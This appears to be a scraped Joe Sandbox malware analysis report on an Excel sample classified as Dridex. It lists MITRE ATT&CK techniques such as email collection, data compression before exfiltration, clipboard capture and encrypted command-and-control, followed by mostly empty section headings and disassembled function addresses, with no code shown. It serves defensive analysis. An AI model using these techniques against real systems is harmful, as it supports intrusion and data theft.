Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 4TWEQh2HJb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "4TWEQh2HJb.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 2109

General

VBA Code Keywords

VBA Code

Function 10010754, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 650
COMMONCrypto

Function 1001223C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 10012840, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 10019B00, Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMON

Function 100110C8, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 1001578C, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 10015B14, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 10015B95, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 10015BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 10015BA9, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 10015B8B, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 10015BD9, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 10011054, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON